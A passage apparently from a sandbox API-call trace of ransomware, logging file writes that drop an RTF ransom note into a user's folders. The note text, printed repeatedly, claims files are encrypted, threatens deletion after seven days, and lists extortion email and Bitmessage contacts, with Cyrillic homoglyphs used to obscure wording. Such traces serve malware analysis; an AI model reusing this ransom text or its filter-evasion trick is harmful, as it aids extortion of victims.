w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nGoH\x93Ò\x14FE¶\x8a\x10Oå \x18¸a¸éP\x10úÈ\x13\n", lpUsedDefaultChar=0x0) returned 8717 [0298.961] WriteFile (in: hFile=0x27c, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.962] CloseHandle (hObject=0x27c) returned 1 [0298.962] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\#readme_eman#.rtf")) returned 0xffffffff [0298.962] GetLastError () returned 0x2 [0298.962] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mn\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mn\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.963] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.963] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK 